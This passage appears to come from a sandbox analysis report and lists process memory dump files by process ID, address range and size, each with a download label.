                                                                                                                                                              • memory/4868-1736-0x0000000000E50000-0x0000000001164000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                3.1MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/4920-1278-0x0000000000B20000-0x0000000000FD3000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/4980-1790-0x0000000000A20000-0x0000000000B6C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.3MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/4980-1791-0x0000000005450000-0x000000000554E000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1016KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-32-0x0000000000BB1000-0x0000000000C19000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                416KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-15-0x0000000077A04000-0x0000000077A06000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                8KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-31-0x0000000000BB0000-0x0000000001063000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-14-0x0000000000BB0000-0x0000000001063000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-16-0x0000000000BB1000-0x0000000000C19000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                416KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-17-0x0000000000BB0000-0x0000000001063000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5052-18-0x0000000000BB0000-0x0000000001063000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5080-159-0x0000000000670000-0x0000000000B2B000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5080-168-0x0000000000670000-0x0000000000B2B000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5084-277-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                372KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5084-279-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                372KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5272-1195-0x0000000000C40000-0x00000000010FB000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5272-1030-0x0000000000C40000-0x00000000010FB000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5392-1257-0x000000001B7F0000-0x000000001B840000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                320KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5392-1258-0x000000001B900000-0x000000001B9B2000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                712KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5392-1390-0x000000001B8C0000-0x000000001B8FC000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                240KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5392-1389-0x000000001B860000-0x000000001B872000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                72KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-619-0x00000000079A0000-0x0000000007AAA000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.0MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-1231-0x0000000009E10000-0x0000000009E2E000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                120KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-1219-0x0000000009A50000-0x0000000009AE2000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                584KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-801-0x0000000009380000-0x00000000098AC000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                5.2MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-800-0x0000000008C80000-0x0000000008E42000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                1.8MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-959-0x0000000000A40000-0x0000000000EBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.5MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-612-0x0000000000A40000-0x0000000000EBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.5MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-613-0x0000000000A40000-0x0000000000EBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.5MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-614-0x0000000000A40000-0x0000000000EBE000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.5MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-616-0x0000000007D10000-0x0000000008328000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                6.1MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-617-0x0000000005490000-0x00000000054A2000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                72KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5412-618-0x0000000007730000-0x000000000776C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                240KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5420-790-0x0000000000B60000-0x000000000102A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.8MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5420-611-0x0000000000B60000-0x000000000102A000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                4.8MB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5832-706-0x00000254AA8A0000-0x00000254AA8C2000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                136KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5832-717-0x00000254AAB50000-0x00000254AAB6C000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                112KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5832-720-0x00000254AAAF0000-0x00000254AAAFA000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5832-721-0x00000254AACB0000-0x00000254AACB8000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                32KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/5832-722-0x00000254AACC0000-0x00000254AACCA000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                40KB

                                                                                                                                                                Download

                                                                                                                                                              • memory/6128-1748-0x0000000000400000-0x0000000000704000-memory.dmp

                                                                                                                                                                Filesize

                                                                                                                                                                3.0MB

                                                                                                                                                                Download